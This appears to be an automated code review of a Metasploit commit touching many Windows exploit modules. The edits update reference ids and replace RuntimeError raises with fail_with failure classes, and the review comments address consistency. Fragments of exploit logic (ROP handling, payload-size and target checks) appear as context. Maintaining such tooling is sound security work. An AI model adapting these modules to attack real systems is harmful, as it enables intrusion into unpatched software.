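Review bot: In the description, `Irfanview\'s` sits inside a `%q{}` literal, where `\'` is not an escape sequence, so the backslash is printed verbatim in the module info; write `Irfanview's`. The text also mixes `<= 4.3.2.0`, `v4.3.2` and the target name `Irfanview 4.32`, and a single version notation would make it clearer which builds are affected. The three `Component0Pr` comments in the SIZ section presumably describe components 0, 1 and 2 and should be numbered accordingly. The `# encode our string like unicode` comment above `encode_bytes` would be more accurate as `# swap each pair of adjacent bytes`, which is what the loop does.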
diff --git a/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb b/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb
index 950c2fa5f0..18c82de3c2 100644
--- a/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb
+++ b/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb
@@ -36,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
- [ 'OSVDB', '72455'],
+ [ 'OSVDB', '72063'],
[ 'URL', 'http://www.corelan.be/advisories.php?id=CORELAN-11-002' ],
],
'DefaultOptions' =>
diff --git a/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb b/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb
index ba33a76194..b777d37f98 100644
--- a/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb
+++ b/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb
@@ -30,6 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
+ [ 'CVE', '2010-4742' ],
[ 'OSVDB', '68986'],
[ 'URL', 'http://www.moxa.com' ],
],
diff --git a/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb b/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb
index bf9a5ece0f..5645104a92 100644
--- a/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb
+++ b/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb
@@ -156,11 +156,11 @@ class Metasploit3 < Msf::Exploit::Remote
out = File.expand_path(File.join(datastore['OUTPUTPATH'], datastore['FILENAME']))
stg = Rex::OLE::Storage.new(out, Rex::OLE::STGM_WRITE)
if (not stg)
- raise RuntimeError, 'Unable to create output file'
+ fail_with(Exploit::Failure::Unknown, 'Unable to create output file')
end
stm = stg.create_stream("Workbook")
if (not stm)
- raise RuntimeError, 'Unable to create workbook stream'
+ fail_with(Exploit::Failure::Unknown, 'Unable to create workbook stream')
end
stm << content
stm.close
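Review bot: The failure class for `'Unable to create output file'` is `Exploit::Failure::Unknown` here and in the first hunk of ms10_004_textbytesatom.rb, while ms11_006_createsizeddibsection.rb reports the same message as `Exploit::Failure::BadConfig`. A file that cannot be created from `OUTPUTPATH`/`FILENAME` is most likely a path or permission problem, so `fail_with(Exploit::Failure::BadConfig, 'Unable to create output file')` would be the consistent choice. The stream-creation failure can stay `Unknown`. The enclosing method starts and ends outside the hunk.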
diff --git a/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb b/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb
index 88c146c439..c53609244e 100644
--- a/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb
+++ b/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb
@@ -227,13 +227,13 @@ class Metasploit3 < Msf::Exploit::Remote
out = datastore['FILENAME']
stg = Rex::OLE::Storage.new(out, Rex::OLE::STGM_WRITE)
if (not stg)
- raise RuntimeError, 'Unable to create output file'
+ fail_with(Exploit::Failure::Unknown, 'Unable to create output file')
end
# PowerPoint Document stream
stm = stg.create_stream("PowerPoint Document")
if (not stm)
- raise RuntimeError, 'Unable to create "PowerPoint Document" stream'
+ fail_with(Exploit::Failure::Unknown, 'Unable to create "PowerPoint Document" stream')
end
stm << content
stm.close
@@ -256,7 +256,7 @@ class Metasploit3 < Msf::Exploit::Remote
stm = stg.create_stream("Current User")
if (not stm)
- raise RuntimeError, 'Unable to create "Current User" stream'
+ fail_with(Exploit::Failure::Unknown, 'Unable to create "Current User" stream')
end
stm << current_user_stream
stm.close
diff --git a/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb b/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb
index c25be95639..b60b700e38 100644
--- a/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb
+++ b/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb
@@ -122,12 +122,12 @@ class Metasploit3 < Msf::Exploit::Remote
out = ::File.expand_path(::File.join(datastore['OUTPUTPATH'], datastore['FILENAME']))
stg = Rex::OLE::Storage.new(out, Rex::OLE::STGM_WRITE)
if (not stg)
- raise RuntimeError, 'Unable to create output file'
+ fail_with(Exploit::Failure::BadConfig, 'Unable to create output file')
end
stm = stg.create_stream("\x05SummaryInformation")
if (not stm)
- raise RuntimeError, 'Unable to create SummaryInformation stream'
+ fail_with(Exploit::Failure::BadConfig, 'Unable to create SummaryInformation stream')
end
stm << generate_summaryinfo()
stm.close
@@ -295,7 +295,7 @@ class Metasploit3 < Msf::Exploit::Remote
rop_stack.map! { |e|
if e.kind_of? String
# Meta-replace (RVA)
- raise RuntimeError, "Unable to locate key: \"#{e}\"" if not rvas[e]
+ fail_with(Exploit::Failure::BadConfig, "Unable to locate key: \"#{e}\"") if not rvas[e]
rvas['BaseAddress'] + rvas[e]
elsif e == :unused
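Review bot: The String branch of `rop_stack.map!` repeats exactly what `rva2addr` does (changed in the next hunk of this file), so the check and its message have to be kept in sync in two places. Assuming `rva2addr` is reachable from this method, the two lines can become `rva2addr(rvas, e)`. vlc_modplug_s3m.rb has the same pair of hunks, and there the identical "Unable to locate key" failure is classed `Unknown` while this file uses `BadConfig`; one class should be chosen for both files. The `map!` block continues past the end of the hunk.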
@@ -312,7 +312,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def rva2addr(rvas, key)
- raise RuntimeError, "Unable to locate key: \"#{key}\"" if not rvas[key]
+ fail_with(Exploit::Failure::BadConfig, "Unable to locate key: \"#{key}\"") if not rvas[key]
rvas['BaseAddress'] + rvas[key]
end
diff --git a/modules/exploits/windows/fileformat/scadaphone_zip.rb b/modules/exploits/windows/fileformat/scadaphone_zip.rb
index c175e4ca9e..326850608e 100644
--- a/modules/exploits/windows/fileformat/scadaphone_zip.rb
+++ b/modules/exploits/windows/fileformat/scadaphone_zip.rb
@@ -38,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
- #[ 'CVE', '' ],
+ [ 'CVE', '2011-4535' ],
[ 'OSVDB', '75375' ],
[ 'URL', 'http://www.scadatec.com/' ],
[ 'EDB', 17817 ],
diff --git a/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb b/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb
index 8b88c89bea..2869e3eb69 100644
--- a/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb
+++ b/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb
@@ -228,7 +228,7 @@ EOS
EOS
copy_stage = Metasm::Shellcode.assemble(Metasm::Ia32.new, copy_stage).encode_string
if (copy_stage.length % 4) > 0
- raise RuntimeError, "The copy stage is invalid"
+ fail_with(Exploit::Failure::Unknown, "The copy stage is invalid")
end
rop_stack = [
@@ -296,7 +296,7 @@ EOS
rop_stack.map! { |e|
if e.kind_of? String
# Meta-replace (RVA)
- raise RuntimeError, "Unable to locate key: \"#{e}\"" if not rvas[e]
+ fail_with(Exploit::Failure::Unknown, "Unable to locate key: \"#{e}\"") if not rvas[e]
rvas['BaseAddress'] + rvas[e]
elsif e == :unused
@@ -313,7 +313,7 @@ EOS
end
def rva2addr(rvas, key)
- raise RuntimeError, "Unable to locate key: \"#{key}\"" if not rvas[key]
+ fail_with(Exploit::Failure::Unknown, "Unable to locate key: \"#{key}\"") if not rvas[key]
rvas['BaseAddress'] + rvas[key]
end
diff --git a/modules/exploits/windows/fileformat/vlc_smb_uri.rb b/modules/exploits/windows/fileformat/vlc_smb_uri.rb
index 80c4d760e3..5adf16ec5b 100644
--- a/modules/exploits/windows/fileformat/vlc_smb_uri.rb
+++ b/modules/exploits/windows/fileformat/vlc_smb_uri.rb
@@ -39,7 +39,6 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'OSVDB', '55509' ],
[ 'CVE', '2009-2484' ],
[ 'URL', 'http://git.videolan.org/?p=vlc.git;a=commit;h=e60a9038b13b5eb805a76755efc5c6d5e080180f' ],
- [ 'URL', 'http://milw0rm.com/exploits/9209' ],
[ 'EDB', 9029 ]
],
'Payload' =>
diff --git a/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb b/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb
index e252509cde..ea0f2e8994 100644
--- a/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb
+++ b/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb
@@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
+ [ 'CVE', '2008-2789' ],
[ 'BID', '46290' ],
[ 'EDB', '16141' ]
],
diff --git a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb
index 2801f3096f..fdec319167 100644
--- a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb
+++ b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb
@@ -34,7 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2004-0964' ],
[ 'OSVDB', '10416' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/7888' ],
+ [ 'EDB', '7888' ],
[ 'BID', '11248' ],
],
'Payload' =>
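Review bot: The new `[ 'EDB', '7888' ]` passes the Exploit-DB id as a string, while entries visible elsewhere in this commit (`[ 'EDB', 588]`, `[ 'EDB', 17817 ]`, `[ 'EDB', 18102 ]`) pass an integer. Both forms probably produce the same reference link, but one should be used throughout, e.g. `[ 'EDB', 7888 ],`. The other milw0rm-to-EDB conversions in this commit (dreamftp_format.rb, leapftp_pasv_reply.rb, sami_ftpd_user.rb and the rest) use the string form as well.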
diff --git a/modules/exploits/windows/ftp/ability_server_stor.rb b/modules/exploits/windows/ftp/ability_server_stor.rb
index 308722b3e9..1eba0a137c 100644
--- a/modules/exploits/windows/ftp/ability_server_stor.rb
+++ b/modules/exploits/windows/ftp/ability_server_stor.rb
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'References' =>
[
- [ 'URL', '2004-1626' ],
+ [ 'CVE', '2004-1626' ],
[ 'OSVDB', '11030'],
[ 'EDB', 588],
],
diff --git a/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb b/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb
index 48fd7ece81..563d96b461 100644
--- a/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb
+++ b/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb
@@ -26,8 +26,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
- #[ 'OSVDB', '---' ],
- #[ 'CVE', '---' ],
+ [ 'OSVDB', '77105' ],
[ 'EDB', 18102 ]
],
'DefaultOptions' =>
diff --git a/modules/exploits/windows/ftp/dreamftp_format.rb b/modules/exploits/windows/ftp/dreamftp_format.rb
index 7f2f4066bc..867eac60b7 100644
--- a/modules/exploits/windows/ftp/dreamftp_format.rb
+++ b/modules/exploits/windows/ftp/dreamftp_format.rb
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2004-2074'],
[ 'OSVDB', '4986'],
[ 'BID', '9800'],
- [ 'URL', 'http://www.milw0rm.com/exploits/823'],
+ [ 'EDB', '823']
],
'Platform' => ['win'],
'Privileged' => false,
diff --git a/modules/exploits/windows/ftp/leapftp_pasv_reply.rb b/modules/exploits/windows/ftp/leapftp_pasv_reply.rb
index bdedeb6c59..40e6594c2f 100644
--- a/modules/exploits/windows/ftp/leapftp_pasv_reply.rb
+++ b/modules/exploits/windows/ftp/leapftp_pasv_reply.rb
@@ -31,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2003-0558' ],
[ 'OSVDB', '4587' ],
[ 'BID', '7860' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/54' ],
+ [ 'EDB', '54' ]
],
'DefaultOptions' =>
{
diff --git a/modules/exploits/windows/ftp/sami_ftpd_user.rb b/modules/exploits/windows/ftp/sami_ftpd_user.rb
index e9bf8eb58f..8ed65c5592 100644
--- a/modules/exploits/windows/ftp/sami_ftpd_user.rb
+++ b/modules/exploits/windows/ftp/sami_ftpd_user.rb
@@ -43,11 +43,11 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'BID', '16370'],
[ 'BID', '22045'],
[ 'BID', '17835'],
- [ 'URL', 'http://www.milw0rm.com/exploits/1448'],
- [ 'URL', 'http://www.milw0rm.com/exploits/1452'],
- [ 'URL', 'http://www.milw0rm.com/exploits/1462'],
- [ 'URL', 'http://www.milw0rm.com/exploits/3127'],
- [ 'URL', 'http://www.milw0rm.com/exploits/3140'],
+ [ 'EDB', '1448'],
+ [ 'EDB', '1452'],
+ [ 'EDB', '1462'],
+ [ 'EDB', '3127'],
+ [ 'EDB', '3140']
],
'DefaultOptions' =>
{
diff --git a/modules/exploits/windows/games/mohaa_getinfo.rb b/modules/exploits/windows/games/mohaa_getinfo.rb
index 47edefee19..a832eebf63 100644
--- a/modules/exploits/windows/games/mohaa_getinfo.rb
+++ b/modules/exploits/windows/games/mohaa_getinfo.rb
@@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2004-0735'],
[ 'OSVDB', '8061' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/357'],
+ [ 'EDB', '357'],
[ 'BID', '10743'],
],
'Privileged' => false,
diff --git a/modules/exploits/windows/games/racer_503beta5.rb b/modules/exploits/windows/games/racer_503beta5.rb
index 2d51278929..0fbf35406f 100644
--- a/modules/exploits/windows/games/racer_503beta5.rb
+++ b/modules/exploits/windows/games/racer_503beta5.rb
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2007-4370' ],
[ 'OSVDB', '39601' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/4283' ],
+ [ 'EDB', '4283' ],
[ 'BID', '25297' ],
],
'Payload' =>
diff --git a/modules/exploits/windows/http/altn_securitygateway.rb b/modules/exploits/windows/http/altn_securitygateway.rb
index 5b627060a5..e2eb512213 100644
--- a/modules/exploits/windows/http/altn_securitygateway.rb
+++ b/modules/exploits/windows/http/altn_securitygateway.rb
@@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Attempting to automatically select a target...")
mytarget = auto_target
if mytarget.nil?
- raise RuntimeError, "Unable to automatically select a target"
+ fail_with(Exploit::Failure::NoTarget, "Unable to automatically select a target")
end
print_status("Automatically selected target \"#{mytarget.name}\"")
end
diff --git a/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb b/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb
index 231947d0e9..ff2b23ca7f 100644
--- a/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb
+++ b/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb
@@ -39,9 +39,9 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'OSVDB', '27588' ],
[ 'BID', '19204' ],
[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/3680' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/3996' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/2237' ],
+ [ 'EDB', '3680' ],
+ [ 'EDB', '3996' ],
+ [ 'EDB', '2237' ]
],
'DefaultOptions' =>
{
diff --git a/modules/exploits/windows/http/belkin_bulldog.rb b/modules/exploits/windows/http/belkin_bulldog.rb
index 7a53b02514..1ebcde2f59 100644
--- a/modules/exploits/windows/http/belkin_bulldog.rb
+++ b/modules/exploits/windows/http/belkin_bulldog.rb
@@ -31,6 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'OSVDB', '54395' ],
[ 'BID', '34033' ],
+ [ 'EDB', '8173' ]
],
'Privileged' => true,
'DefaultOptions' =>
diff --git a/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb b/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
index 8e812e5025..9648071c54 100644
--- a/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
+++ b/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
@@ -36,17 +36,19 @@ class Metasploit3 < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
- [ 'EDB', 17574 ],
+ [ 'CVE', '2011-3011' ],
+ [ 'OSVDB', '74162' ],
+ [ 'EDB', 17574 ]
],
'DefaultOptions' =>
{
- 'EXITFUNC' => 'process',
+ 'EXITFUNC' => 'process'
},
'Privileged' => true,
'Payload' =>
{
'Space' => 1000,
- 'BadChars' => "\x00\x0d\x0a",
+ 'BadChars' => "\x00\x0d\x0a"
},
'Platform' => 'win',
'Targets' =>
diff --git a/modules/exploits/windows/http/ca_igateway_debug.rb b/modules/exploits/windows/http/ca_igateway_debug.rb
index 72be6f57b1..7bac383c1c 100644
--- a/modules/exploits/windows/http/ca_igateway_debug.rb
+++ b/modules/exploits/windows/http/ca_igateway_debug.rb
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2005-3190' ],
[ 'OSVDB', '19920' ],
[ 'URL', 'http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=33485' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/1243' ],
+ [ 'EDB', '1243' ],
[ 'BID', '15025' ],
],
'DefaultOptions' =>
diff --git a/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb b/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb
index 48ec7f969f..2f417cfedd 100644
--- a/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb
+++ b/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb
@@ -110,7 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote
if ( res and res.body =~ /SUCCESS/ )
#print_good("Executing command...")
else
- raise RuntimeError, 'Something went wrong.'
+ fail_with(Exploit::Failure::Unknown, 'Something went wrong.')
end
end
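Review bot: `fail_with(Exploit::Failure::Unknown, 'Something went wrong.')` in the `else` branch covers two different outcomes, a nil `res` (presumably a timeout or connection failure) and a response whose body lacks `SUCCESS`, and does not tell the operator which one occurred. Splitting it gives a usable failure reason: `fail_with(Exploit::Failure::Unreachable, 'No response from the server') unless res` followed by `fail_with(Exploit::Failure::UnexpectedReply, 'Server did not report SUCCESS') unless res.body =~ /SUCCESS/`. That also removes the empty `if` branch holding only a commented-out `print_good`. The response checks in hp_nnm_ovwebsnmpsrv_main.rb, hp_nnm_ovwebsnmpsrv_ovutil.rb and novell_imanager_upload.rb are converted to `Unknown` in the same way. The method starts outside the hunk.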
@@ -128,7 +128,7 @@ class Metasploit3 < Msf::Exploit::Remote
when 'win'
windows_stager
else
- raise RuntimeError, 'Target not supported.'
+ fail_with(Exploit::Failure::Unknown, 'Target not supported.')
end
handler
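Review bot: `'Target not supported.'` is raised as `Exploit::Failure::Unknown` although the cause is known: the selected target matched none of the `when` arms. Other modules in this commit use `NoTarget` for target-selection failures, so `fail_with(Exploit::Failure::NoTarget, 'Target not supported.')` would be consistent. osb_uname_jlist.rb has the identical line. The `case` statement begins outside the hunk.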
diff --git a/modules/exploits/windows/http/easyftp_list.rb b/modules/exploits/windows/http/easyftp_list.rb
index a1be8431aa..e1695a4a3f 100644
--- a/modules/exploits/windows/http/easyftp_list.rb
+++ b/modules/exploits/windows/http/easyftp_list.rb
@@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
if (payload.encoded.length > payload_space)
- raise RuntimeError, "Insufficient space for payload, try using a staged, ORD and/or shell payload."
+ fail_with(Exploit::Failure::Unknown, "Insufficient space for payload, try using a staged, ORD and/or shell payload.")
end
# Fix up ESP, jmp to the beginning of the buffer
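Review bot: The payload-size check fails with `Exploit::Failure::Unknown`, but its message tells the operator to choose a different payload, which makes it a configuration error: `fail_with(Exploit::Failure::BadConfig, "Insufficient space for payload, try using a staged, ORD and/or shell payload.")`. The `ExitOnSession` check in lotusnotes_lzh.rb is the same kind of operator-fixable condition and is also converted to `Unknown`. `exploit` continues past the end of the hunk.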
diff --git a/modules/exploits/windows/http/ezserver_http.rb b/modules/exploits/windows/http/ezserver_http.rb
index 6b0348bf3f..3e15f0d394 100644
--- a/modules/exploits/windows/http/ezserver_http.rb
+++ b/modules/exploits/windows/http/ezserver_http.rb
@@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
+ [ 'OSVDB', '83065' ],
[ 'BID', '54056' ],
[ 'EDB', '19266' ],
[ 'URL', 'http://www.spentera.com/2012/06/ezhometech-ezserver-6-4-017-stack-overflow-vulnerability/' ]
diff --git a/modules/exploits/windows/http/hp_nnm_ovas.rb b/modules/exploits/windows/http/hp_nnm_ovas.rb
index e4e3501030..4fc428c207 100644
--- a/modules/exploits/windows/http/hp_nnm_ovas.rb
+++ b/modules/exploits/windows/http/hp_nnm_ovas.rb
@@ -118,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote
when /NNM Release B.07.51/
targ = targets[2]
else
- raise RuntimeError, "Unable to determine a target automatically..."
+ fail_with(Exploit::Failure::NoTarget, "Unable to determine a target automatically...")
# if snmp is running you could set the target based on community strings
end
@@ -177,7 +177,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
if not resp.nil?
- raise RuntimeError, "The server responded, that wasn't supposed to happen!"
+ fail_with(Exploit::Failure::Unknown, "The server responded, that wasn't supposed to happen!")
end
print_status("Malformed http request sent.")
diff --git a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb
index 4bebd2168f..642cb0c93b 100644
--- a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb
+++ b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb
@@ -155,7 +155,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
if not res
- raise RuntimeError, "Eek! We didn't get a response.. Exploiting this vuln should return one!"
+ fail_with(Exploit::Failure::Unknown, "Eek! We didn't get a response.. Exploiting this vuln should return one!")
end
print_status(res.body) if datastore["NNM_DEBUG"]
@@ -163,7 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote
if res.body =~ /graphing applet is being/
print_status("We got the body we were looking for, the session should be coming any second.")
else
- raise RuntimeError, "Eek, exploit likely failed. The body didn't contain what we expected."
+ fail_with(Exploit::Failure::Unknown, "Eek, exploit likely failed. The body didn't contain what we expected.")
end
handler
diff --git a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb
index d5bfd57573..de3912f278 100644
--- a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb
+++ b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb
@@ -158,7 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
if not res
- raise RuntimeError, "Eek! We didn't get a response.. Exploiting this vuln should return one!"
+ fail_with(Exploit::Failure::Unknown, "Eek! We didn't get a response.. Exploiting this vuln should return one!")
end
print_status(res.body) if datastore["NNM_DEBUG"]
@@ -166,7 +166,7 @@ class Metasploit3 < Msf::Exploit::Remote
if res.body =~ /graphing applet is being/
print_status("We got the body we were looking for, the session should be coming any second.")
else
- raise RuntimeError, "Eek, exploit likely failed. The body didn't contain what we expected."
+ fail_with(Exploit::Failure::Unknown, "Eek, exploit likely failed. The body didn't contain what we expected.")
end
handler
diff --git a/modules/exploits/windows/http/httpdx_tolog_format.rb b/modules/exploits/windows/http/httpdx_tolog_format.rb
index 701c732a23..82e3ef17eb 100644
--- a/modules/exploits/windows/http/httpdx_tolog_format.rb
+++ b/modules/exploits/windows/http/httpdx_tolog_format.rb
@@ -167,7 +167,7 @@ For now, that will have to be done manually.
version = get_version
if not version
- raise RuntimeError, "The server doesn't appear to be running a vulnerable version of HTTPDX"
+ fail_with(Exploit::Failure::Unknown, "The server doesn't appear to be running a vulnerable version of HTTPDX")
end
re = Regexp.new(Regexp.escape(version)+' - ', true)
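Review bot: A nil `version` is reported as `Exploit::Failure::Unknown` even though the message states the conclusion, that the server does not look vulnerable. `Exploit::Failure::NotVulnerable` fits better: `fail_with(Exploit::Failure::NotVulnerable, "The server doesn't appear to be running a vulnerable version of HTTPDX")`. In the second hunk of this file the `not mytarget` case should be `NoTarget`, as integard_password_bof.rb and w3who_query.rb use for the same situation in this commit. The method starts and ends outside both hunks.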
@@ -179,7 +179,7 @@ For now, that will have to be done manually.
end
if (not mytarget)
- raise RuntimeError, 'Unable to automatically detect exploitation parameters'
+ fail_with(Exploit::Failure::Unknown, 'Unable to automatically detect exploitation parameters')
end
print_status("Selected Target: #{mytarget.name}")
diff --git a/modules/exploits/windows/http/integard_password_bof.rb b/modules/exploits/windows/http/integard_password_bof.rb
index 9ef4706325..1207678638 100644
--- a/modules/exploits/windows/http/integard_password_bof.rb
+++ b/modules/exploits/windows/http/integard_password_bof.rb
@@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
if not mytarget
- raise RuntimeError, "Unable to automatically detect the target version"
+ fail_with(Exploit::Failure::NoTarget, "Unable to automatically detect the target version")
end
print_status("Selected Target: #{mytarget.name}")
diff --git a/modules/exploits/windows/http/mcafee_epolicy_source.rb b/modules/exploits/windows/http/mcafee_epolicy_source.rb
index 3c3b54d4db..1208018363 100644
--- a/modules/exploits/windows/http/mcafee_epolicy_source.rb
+++ b/modules/exploits/windows/http/mcafee_epolicy_source.rb
@@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2006-5156' ],
[ 'OSVDB', '29421' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/2467' ],
+ [ 'EDB', '2467' ],
[ 'URL', 'http://www.remote-exploit.org/advisories/mcafee-epo.pdf' ],
[ 'BID', '20288' ],
],
diff --git a/modules/exploits/windows/http/netdecision_http_bof.rb b/modules/exploits/windows/http/netdecision_http_bof.rb
index e5e9419906..81db81cb0d 100644
--- a/modules/exploits/windows/http/netdecision_http_bof.rb
+++ b/modules/exploits/windows/http/netdecision_http_bof.rb
@@ -30,6 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
+ ['CVE', '2012-1465'],
['OSVDB', '79651'],
['URL', 'http://secunia.com/advisories/48168/'],
['URL', 'http://secpod.org/advisories/SecPod_Netmechanica_NetDecision_HTTP_Server_DoS_Vuln.txt']
diff --git a/modules/exploits/windows/http/novell_imanager_upload.rb b/modules/exploits/windows/http/novell_imanager_upload.rb
index f6cef8f099..616e383419 100644
--- a/modules/exploits/windows/http/novell_imanager_upload.rb
+++ b/modules/exploits/windows/http/novell_imanager_upload.rb
@@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote
}, 5)
handler
else
- raise RuntimeError, 'POST failed'
+ fail_with(Exploit::Failure::Unknown, 'POST failed')
end
end
diff --git a/modules/exploits/windows/http/osb_uname_jlist.rb b/modules/exploits/windows/http/osb_uname_jlist.rb
index 25f079bd25..2e77f702e3 100644
--- a/modules/exploits/windows/http/osb_uname_jlist.rb
+++ b/modules/exploits/windows/http/osb_uname_jlist.rb
@@ -110,7 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote
when 'win'
windows_stager
else
- raise RuntimeError, 'Target not supported.'
+ fail_with(Exploit::Failure::Unknown, 'Target not supported.')
end
handler
diff --git a/modules/exploits/windows/http/psoproxy91_overflow.rb b/modules/exploits/windows/http/psoproxy91_overflow.rb
index 8e6090b5a1..104dfdba0f 100644
--- a/modules/exploits/windows/http/psoproxy91_overflow.rb
+++ b/modules/exploits/windows/http/psoproxy91_overflow.rb
@@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2004-0313' ],
[ 'OSVDB', '4028' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/156' ],
+ [ 'EDB', '156' ],
[ 'BID', '9706' ],
],
'DefaultOptions' =>
diff --git a/modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb b/modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb
index 8d1efb4ca4..fbea3a7691 100644
--- a/modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb
+++ b/modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb
@@ -141,12 +141,12 @@ class Metasploit4 < Msf::Exploit::Remote
abort("Exploit not complete, check credentials")
elsif body.match(/Permission denied/i)
print_error("[SAP] The Supplied credentials are valid, but lack OSExecute permissions")
- raise RuntimeError.new("Exploit not complete, check credentials")
+ fail_with(Exploit::Failure::NoAccess, "Exploit not complete, check credentials")
end
end
rescue ::Rex::ConnectionError
- print_error("[SAP] Unable to attempt authentication")
+ fail_with(Exploit::Failure::Unreachable, "Could not access SAP service")
break
end
end
